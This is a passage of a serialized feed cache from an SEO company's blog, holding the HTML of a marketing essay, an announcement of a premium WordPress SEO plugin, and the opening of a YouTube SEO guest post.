src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/07/hooking-consumers.jpg\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Consumers Can See Through the Bait\"></div>\n</figure>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\">\n<p>You Can&#8217;t Be Serious?<br data-mce-bogus=\"1\"/></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>Let&#8217;s face it, times have changed and what worked yesterday has no guarantee of remaining relevant and working tomorrow.</p>\n<p>What most of us often overlook is that as the web evolves so does our nervous system and how it maps the priorities of how we communicate. Essentially, we develop blinders to keep us sane from information overload.</p>\n<p>Just like banner blindness is real, your ads, links, headlines, images and everything else <em>needs to be more human than ever</em> and have a more <strong>down to earth appeal</strong> vs. I&#8217;m selling you something (as if you don&#8217;t know it) if you ever want to see genuine conversions (which is why native advertising has displaced traditional ads).</p>\n<p>Yesterday&#8217;s marketing founded from the Madmen in the 60&#8217;s in today&#8217;s cinema plays like a bad dream we&#8217;ve been stuck in and trying to wake up from. </p>\n<p>The speaking at you vs. to speaking to you was blatantly overstated by them telling you what to do rather than listening and responding to your needs.</p>\n<p>So&#8230;making the shift from the old paradigm to the new paradigm of marketing is the basis of true engagement (<em>without offending your audiences intelligence)</em> as well as one of the safest ways to promote your brand while preserving its integrity.</p>\n<p>So, I challenge you to <strong>go back through your copy</strong>, your website and your communications and see whether or not you were writing it for YOU or for your CUSTOMERS?</p>\n<p>Just realize, it&#8217;s not too late&#8230; it&#8217;s just time to dust off your keyboard and make some worthwhile edits to boost conversions.</p>\n<p>The million dollar question is, are you writing what you THINK they want to hear, or communicating with clarity that they need to make an informed purchase?</p>\n<p>Until the next time.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=h51XQfdCDXU:sgo_RwnERfM:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/h51XQfdCDXU\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:474:\"You Can&#8217;t Be Serious? Let&#8217;s face it, times have changed and what worked yesterday has no guarantee of remaining relevant and working tomorrow. What most of us often overlook is that as the web evolves so does our nervous system and how it maps the priorities of how we communicate. Essentially, we develop blinders to <a href=\"http://www.seodesignsolutions.com/blog/articles/why-good-enough-just-isnt-good-enough-anymore/\" class=\"read-more-excerpt\">Read More</a>\";s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:94:\"http://www.seodesignsolutions.com/blog/articles/why-good-enough-just-isnt-good-enough-anymore/\";}s:7:\"summary\";s:474:\"You Can&#8217;t Be Serious? Let&#8217;s face it, times have changed and what worked yesterday has no guarantee of remaining relevant and working tomorrow. What most of us often overlook is that as the web evolves so does our nervous system and how it maps the priorities of how we communicate. Essentially, we develop blinders to <a href=\"http://www.seodesignsolutions.com/blog/articles/why-good-enough-just-isnt-good-enough-anymore/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:2891:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/07/hooking-consumers.jpg\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Consumers Can See Through the Bait\"></div>\n</figure>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\">\n<p>You Can&#8217;t Be Serious?<br data-mce-bogus=\"1\"/></p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>Let&#8217;s face it, times have changed and what worked yesterday has no guarantee of remaining relevant and working tomorrow.</p>\n<p>What most of us often overlook is that as the web evolves so does our nervous system and how it maps the priorities of how we communicate. Essentially, we develop blinders to keep us sane from information overload.</p>\n<p>Just like banner blindness is real, your ads, links, headlines, images and everything else <em>needs to be more human than ever</em> and have a more <strong>down to earth appeal</strong> vs. I&#8217;m selling you something (as if you don&#8217;t know it) if you ever want to see genuine conversions (which is why native advertising has displaced traditional ads).</p>\n<p>Yesterday&#8217;s marketing founded from the Madmen in the 60&#8217;s in today&#8217;s cinema plays like a bad dream we&#8217;ve been stuck in and trying to wake up from. </p>\n<p>The speaking at you vs. to speaking to you was blatantly overstated by them telling you what to do rather than listening and responding to your needs.</p>\n<p>So&#8230;making the shift from the old paradigm to the new paradigm of marketing is the basis of true engagement (<em>without offending your audiences intelligence)</em> as well as one of the safest ways to promote your brand while preserving its integrity.</p>\n<p>So, I challenge you to <strong>go back through your copy</strong>, your website and your communications and see whether or not you were writing it for YOU or for your CUSTOMERS?</p>\n<p>Just realize, it&#8217;s not too late&#8230; it&#8217;s just time to dust off your keyboard and make some worthwhile edits to boost conversions.</p>\n<p>The million dollar question is, are you writing what you THINK they want to hear, or communicating with clarity that they need to make an informed purchase?</p>\n<p>Until the next time.</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=h51XQfdCDXU:sgo_RwnERfM:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/h51XQfdCDXU\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:8;a:13:{s:5:\"title\";s:58:\"SEO Ultimate Launches Premium Version Called SEO Ultimate+\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/CLbuMSbKLvM/\";s:8:\"category\";s:120:\"WordPress SEOSEOSEO UltimateSEO Ultimate Goes PremiumSEO Ultimate WordPress Plugin UpdatedWordPressWordPress SEO Pluginm\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Tue, 30 Jun 2015 02:46:59 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9485\";s:7:\"content\";a:1:{s:7:\"encoded\";s:10438:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">We&#8217;re feeling SUPER (no tens inpunded&#8230;) and just wanted to give you all a quick <strong>heads up</strong> that there&#8217;s a new version of <strong><a href=\"http://www.seodesignsolutions.com\">SEO</a> Ultimate Version 7.6.5.7</strong> available for download from the <a href=\"https://wordpress.org/plugins/seo-ultimate/\">WordPress repository</a> or via your WordPress plugin dashboard.</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\"><iframe style=\"height: 400px;\" src=\"//fast.wistia.net/embed/iframe/qd5yjgfos1?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"700\" height=\"398\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\">The video above covers the free update, however, to see the premium version, keep scrolling ;)</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>As the numeric code implies (since it&#8217;s only incremental) that even though there were some <em>minor bug fixes</em>, this was mostly a cosmetic update to the plugin. </p>\n<p>You&#8217;ll find a few new resources and tools available for you in the SEO Admin Bar <strong>that we cover in the video above</strong>. Also, we&#8217;ve also covered some of the new tools that are accessible from the SEO admin bar. </p>\n<p></p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-left\">\n<h1>SEO Ultimate Goes Premium!</h1>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>Granted, truth be told, the real heavy lifting from this point on is going into <strong>the premium version of the plugin</strong> called <a href=\"https://www.seoultimateplus.com\" data-mce-href=\"https://www.seoultimateplus.com\">SEO Ultimate+</a>. We&#8217;re not going to pull any features, but all new ones move to +.</p>\n<p>For example, there&#8217;s over 7 months of coding time on one module to rewrite the base code of the Open Graph Integrator which has now shifted into its next embodiment&#8230;. (<em>like a caterpillar to a butterfly</em>) the <strong>OpenGraph+ Module</strong> which you can <a href=\"https://www.seoultimateplus.com/screencaps/\" data-mce-href=\"https://www.seoultimateplus.com/screencaps/\">see here</a>, with features like &#8230;</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:10px;\"><strong>Enjoy Simple, Easy-to-Implement Twitter Cards!</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/twitter-summary-card.jpg\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Create All 7 Twitter Cards with SEO Ultimate+\"></div>\n</figure>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:5px;\">\n<p>Now You Can Make Twitter Cards (all 7 types) with Ease! With No Fuss and No Mess!</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\" style=\"padding-top:5px;\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>More Powerful Page Level Settings</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:20px;margin-bottom:20px;\">\n<p>The premium version <strong><a href=\"https://www.seoultimateplus.com\" data-mce-href=\"https://www.seoultimateplus.com\">SEO Ultimate+</a></strong> handles Google+ customization, <strong>Open Graph / Facebook</strong> integration (on a page-by-page, post-by-post or mass edits 100 pages at a time).</p>\n<p>You can create all 7 types of Twitter cards&#8230;<strong>like a BOSS </strong>(<em>that validate flawlessly</em>) as well as there&#8217;s a powerful new arsenal of <strong>rich snippets </strong>to shoot up the SERPs ranging from <strong>Local SEO (Business), Events, Organization, People, Products, Recipes, Reviews, Software</strong> and <strong>Video</strong> (with more to come).</p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/Local-Page-Rich-Snippets.png\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"SEO Ultimate Page Level Rich Snippets\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/Local-Page-Rich-Snippets.png\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:20px;margin-bottom:20px;\">\n<p>There’s even a global fallback in SEO Ultimate+ in case you forget to add custom OG data at the page level where you can assign entire post types to as rules to a specific Open Graph type or specific type of Twitter Cards (<a href=\"https://dev.twitter.com/cards/types\" data-mce-href=\"https://dev.twitter.com/cards/types\">all 7 twitter cards</a> are available and validate).</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>Global Post Type Customization for Open Graph and Twitter Cards.</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/7-Twitter-Card-Types-1200x622.png\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Create Valid Twitter Cards with Ease\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/7-Twitter-Card-Types-1200x622.png\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>The New (Premium) OpenGraph+ Module and 7 New Rich Snippets</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>You can also mass edit pages and posts (up to 100 entries at a time and customize unique titles, meta descriptions, Open Graph, Google+, FB and Twitter inputs).</p>\n<p>Now that’s something you can’t do with the FREE version of SEO Ultimate…since it only has rich-snippets for <em>place</em> and <em>review</em> ;( and sorry guys <strong>no new features on the free version from now on</strong>, only bug fixes as all new feature development is moving exclusively the premium version SEO Ultimate+.</p>\n<p>In any case, this is only the beginning and we’ll be adding new features to SEO Ultimate plus, but don’t worry, there’s still plenty of horsepower in the free version (which you can get <a href=\"https://seodesignframework.leadpages.net/seo-ultimate-video-training/\" data-mce-href=\"https://seodesignframework.leadpages.net/seo-ultimate-video-training/\">FREE video training</a> for here). Before we leave, we&#8217;ll let you play the quick and dirty version of the OpenGraph+ Module video.</p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:35px;margin-bottom:35px;\"><iframe style=\"height: 313px;\" src=\"//fast.wistia.net/embed/iframe/hocfwbb6rd?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"650\" height=\"311\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>But, if you haven’t already, let us know what you think by clicking here and <a href=\"https://wordpress.org/support/view/plugin-reviews/seo-ultimate\" data-mce-href=\"https://wordpress.org/support/view/plugin-reviews/seo-ultimate\">leaving us a review on WordPress</a> ;) or you can show your support by purchasing <a href=\"https://www.seoultimateplus.com/product/seo-ultimate-plus/\" data-mce-href=\"https://www.seoultimateplus.com/product/seo-ultimate-plus/\">SEO Ultimate+</a> for its powerful new features, training and support.</p>\n<p>If you&#8217;re looking&nbsp; to build a new site, make sure to try SEO Ultimate&#8217;s companion product the <a href=\"http://www.seodesignframework.com\" data-mce-href=\"http://www.seodesignframework.com\">SEO Design Framework</a>. </p>\n<p>Thanks for stopping in&#8230; since we can&#8217;t read it, let us know what&#8217;s on your mind. </p>\n<p>Leave a comment below or share this post socially to get the word out about <em><strong>our soft launch for SEO Ultimate+ </strong></em>(up, up and away).</p>\n<p>We look forward to hearing from you or you can be stealthy and just <a href=\"https://twitter.com/@jeffrey_smith\" data-mce-href=\"https://twitter.com/@jeffrey_smith\">follow me on twitter</a> instead.</p>\n<p>All the best!</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=CLbuMSbKLvM:2zGIgKikAM0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/CLbuMSbKLvM\" height=\"1\" width=\"1\" alt=\"\"/>\";}s:11:\"description\";s:515:\"We&#8217;re feeling SUPER (no tens inpunded&#8230;) and just wanted to give you all a quick heads up that there&#8217;s a new version of SEO Ultimate Version 7.6.5.7 available for download from the WordPress repository or via your WordPress plugin dashboard. The video above covers the free update, however, to see the premium version, keep scrolling <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/new-update-plus-seo-ultimate-is-going-premium-up-up-and-away/\" class=\"read-more-excerpt\">Read More</a>\";s:3:\"wfw\";a:1:{s:10:\"commentrss\";s:119:\"http://www.seodesignsolutions.com/blog/wordpress-seo/new-update-plus-seo-ultimate-is-going-premium-up-up-and-away/feed/\";}s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"3\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:114:\"http://www.seodesignsolutions.com/blog/wordpress-seo/new-update-plus-seo-ultimate-is-going-premium-up-up-and-away/\";}s:7:\"summary\";s:515:\"We&#8217;re feeling SUPER (no tens inpunded&#8230;) and just wanted to give you all a quick heads up that there&#8217;s a new version of SEO Ultimate Version 7.6.5.7 available for download from the WordPress repository or via your WordPress plugin dashboard. The video above covers the free update, however, to see the premium version, keep scrolling <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/new-update-plus-seo-ultimate-is-going-premium-up-up-and-away/\" class=\"read-more-excerpt\">Read More</a>\";s:12:\"atom_content\";s:10438:\"<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">We&#8217;re feeling SUPER (no tens inpunded&#8230;) and just wanted to give you all a quick <strong>heads up</strong> that there&#8217;s a new version of <strong><a href=\"http://www.seodesignsolutions.com\">SEO</a> Ultimate Version 7.6.5.7</strong> available for download from the <a href=\"https://wordpress.org/plugins/seo-ultimate/\">WordPress repository</a> or via your WordPress plugin dashboard.</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-center\"><iframe style=\"height: 400px;\" src=\"//fast.wistia.net/embed/iframe/qd5yjgfos1?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"700\" height=\"398\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\">The video above covers the free update, however, to see the premium version, keep scrolling ;)</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>As the numeric code implies (since it&#8217;s only incremental) that even though there were some <em>minor bug fixes</em>, this was mostly a cosmetic update to the plugin. </p>\n<p>You&#8217;ll find a few new resources and tools available for you in the SEO Admin Bar <strong>that we cover in the video above</strong>. Also, we&#8217;ve also covered some of the new tools that are accessible from the SEO admin bar. </p>\n<p></p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-left\">\n<h1>SEO Ultimate Goes Premium!</h1>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>Granted, truth be told, the real heavy lifting from this point on is going into <strong>the premium version of the plugin</strong> called <a href=\"https://www.seoultimateplus.com\" data-mce-href=\"https://www.seoultimateplus.com\">SEO Ultimate+</a>. We&#8217;re not going to pull any features, but all new ones move to +.</p>\n<p>For example, there&#8217;s over 7 months of coding time on one module to rewrite the base code of the Open Graph Integrator which has now shifted into its next embodiment&#8230;. (<em>like a caterpillar to a butterfly</em>) the <strong>OpenGraph+ Module</strong> which you can <a href=\"https://www.seoultimateplus.com/screencaps/\" data-mce-href=\"https://www.seoultimateplus.com/screencaps/\">see here</a>, with features like &#8230;</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:10px;\"><strong>Enjoy Simple, Easy-to-Implement Twitter Cards!</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/twitter-summary-card.jpg\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Create All 7 Twitter Cards with SEO Ultimate+\"></div>\n</figure>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:5px;\">\n<p>Now You Can Make Twitter Cards (all 7 types) with Ease! With No Fuss and No Mess!</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\" style=\"padding-top:5px;\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>More Powerful Page Level Settings</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:20px;margin-bottom:20px;\">\n<p>The premium version <strong><a href=\"https://www.seoultimateplus.com\" data-mce-href=\"https://www.seoultimateplus.com\">SEO Ultimate+</a></strong> handles Google+ customization, <strong>Open Graph / Facebook</strong> integration (on a page-by-page, post-by-post or mass edits 100 pages at a time).</p>\n<p>You can create all 7 types of Twitter cards&#8230;<strong>like a BOSS </strong>(<em>that validate flawlessly</em>) as well as there&#8217;s a powerful new arsenal of <strong>rich snippets </strong>to shoot up the SERPs ranging from <strong>Local SEO (Business), Events, Organization, People, Products, Recipes, Reviews, Software</strong> and <strong>Video</strong> (with more to come).</p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/Local-Page-Rich-Snippets.png\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"SEO Ultimate Page Level Rich Snippets\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/Local-Page-Rich-Snippets.png\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\" text-left\" style=\"margin-top:20px;margin-bottom:20px;\">\n<p>There’s even a global fallback in SEO Ultimate+ in case you forget to add custom OG data at the page level where you can assign entire post types to as rules to a specific Open Graph type or specific type of Twitter Cards (<a href=\"https://dev.twitter.com/cards/types\" data-mce-href=\"https://dev.twitter.com/cards/types\">all 7 twitter cards</a> are available and validate).</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>Global Post Type Customization for Open Graph and Twitter Cards.</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<figure class=\"image-module\">\n<div><img src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/7-Twitter-Card-Types-1200x622.png\" class=\"image-module img-responsive square img-center\" data-no-retina title=\"\" alt=\"Create Valid Twitter Cards with Ease\"></div><figcaption>\n<div class=\"view-more\"><a href=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/7-Twitter-Card-Types-1200x622.png\" class=\"pretty-view clearfix\" data-rel=\"prettyPhoto\">View more</a></div>\n</figcaption></figure>\n</div>\n</div>\n</div>\n</div>\n<div class=\"hero_block row last_row\">\n<div class=\"col-md-12\">\n<div class=\"row\">\n<div class=\"col-md-12\">\n<div class=\"headline clearfix text-center\">\n<h3 style=\"font-size:34px;font-family:Open Sans;color:#222222;margin-top:15px;margin-bottom:25px;\"><strong>The New (Premium) OpenGraph+ Module and 7 New Rich Snippets</strong></h3>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>You can also mass edit pages and posts (up to 100 entries at a time and customize unique titles, meta descriptions, Open Graph, Google+, FB and Twitter inputs).</p>\n<p>Now that’s something you can’t do with the FREE version of SEO Ultimate…since it only has rich-snippets for <em>place</em> and <em>review</em> ;( and sorry guys <strong>no new features on the free version from now on</strong>, only bug fixes as all new feature development is moving exclusively the premium version SEO Ultimate+.</p>\n<p>In any case, this is only the beginning and we’ll be adding new features to SEO Ultimate plus, but don’t worry, there’s still plenty of horsepower in the free version (which you can get <a href=\"https://seodesignframework.leadpages.net/seo-ultimate-video-training/\" data-mce-href=\"https://seodesignframework.leadpages.net/seo-ultimate-video-training/\">FREE video training</a> for here). Before we leave, we&#8217;ll let you play the quick and dirty version of the OpenGraph+ Module video.</p>\n</div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-center\" style=\"margin-top:35px;margin-bottom:35px;\"><iframe style=\"height: 313px;\" src=\"//fast.wistia.net/embed/iframe/hocfwbb6rd?videoFoam=true\" allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" class=\"wistia_embed\" name=\"wistia_embed\" allowfullscreen=\"\" mozallowfullscreen=\"\" webkitallowfullscreen=\"\" oallowfullscreen=\"\" msallowfullscreen=\"\" width=\"650\" height=\"311\"></iframe><script src=\"//fast.wistia.net/assets/external/E-v1.js\"></script></div>\n</div>\n<div class=\"col-md-12\">\n<div class=\" text-left\">\n<p>But, if you haven’t already, let us know what you think by clicking here and <a href=\"https://wordpress.org/support/view/plugin-reviews/seo-ultimate\" data-mce-href=\"https://wordpress.org/support/view/plugin-reviews/seo-ultimate\">leaving us a review on WordPress</a> ;) or you can show your support by purchasing <a href=\"https://www.seoultimateplus.com/product/seo-ultimate-plus/\" data-mce-href=\"https://www.seoultimateplus.com/product/seo-ultimate-plus/\">SEO Ultimate+</a> for its powerful new features, training and support.</p>\n<p>If you&#8217;re looking&nbsp; to build a new site, make sure to try SEO Ultimate&#8217;s companion product the <a href=\"http://www.seodesignframework.com\" data-mce-href=\"http://www.seodesignframework.com\">SEO Design Framework</a>. </p>\n<p>Thanks for stopping in&#8230; since we can&#8217;t read it, let us know what&#8217;s on your mind. </p>\n<p>Leave a comment below or share this post socially to get the word out about <em><strong>our soft launch for SEO Ultimate+ </strong></em>(up, up and away).</p>\n<p>We look forward to hearing from you or you can be stealthy and just <a href=\"https://twitter.com/@jeffrey_smith\" data-mce-href=\"https://twitter.com/@jeffrey_smith\">follow me on twitter</a> instead.</p>\n<p>All the best!</p>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=CLbuMSbKLvM:2zGIgKikAM0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/CLbuMSbKLvM\" height=\"1\" width=\"1\" alt=\"\"/>\";}i:9;a:11:{s:5:\"title\";s:77:\"The Most Effective YouTube SEO Tactics for Guaranteed Video & Website Traffic\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/jEG9LXlzxPI/\";s:8:\"category\";s:8:\"SEO Tips\";s:2:\"dc\";a:1:{s:7:\"creator\";s:10:\"Guest Post\";}s:7:\"pubdate\";s:29:\"Sat, 27 Jun 2015 10:42:57 PDT\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9473\";s:7:\"content\";a:1:{s:7:\"encoded\";s:8887:\"<p><img class=\" wp-image-9479 size-full aligncenter\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/oa_youtube_Channels.png\" alt=\"oa_youtube_Channels\" width=\"640\" height=\"428\" srcset=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/oa_youtube_Channels.png 640w, http://www.seodesignsolutions.com/blog/wp-content/uploads/2015/06/oa_youtube_Channels-300x201.png 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" /></p>\n<p>YouTube is by far the most popular video-sharing sites today. Your business stands to benefit greatly from a YouTube presence in that:</p>\n<ul>\n<li>YouTube only comes after Google &amp; Facebook when it comes to daily visits. Billions of videos are viewed every month on YouTube, meaning there is a very high chance that your video will get many views once you post it.</li>\n<li>You will reach targeted Web traffic. Recent research by Nielsen shows that YouTube gets the most visits from adults aged between 18 and 34.</li>\n<li>It is free to post a video on YouTube, meaning you can put your advertising dollars elsewhere.</li>\n<li>Your YouTube campaign will help you get a more targeted mailing list by asking people who view your videos to sign up 